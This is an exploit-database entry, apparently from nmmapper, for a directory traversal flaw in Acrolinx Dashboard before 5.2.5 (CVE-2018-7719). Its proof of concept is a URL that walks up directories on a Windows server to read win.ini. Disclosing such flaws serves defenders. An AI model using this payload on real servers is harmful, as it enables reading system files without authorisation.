Become a patron and gain access to the dashboard, Schedule scans, API and Search patron
Author
"Berk Dusunur"
Platform
windows
Release date
2018-03-26
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 | # Exploit Title: Acrolinx Dashboard Directory Traversal # CVE: CVE 2018-7719 # Date: 19.02.2017 # Exploit Author: Berk Dusunur # Vendor Homepage: www.acrolinx.com # Version:Before 5.2.5 PoC Acrolinx dashboard windows works on the server. http://localhost/..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini http://www.berkdusunur.net/2018/03/tr-en-acrolinx-dashboard-directory.html |
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/44345/?format=json')
For full documentation follow the link above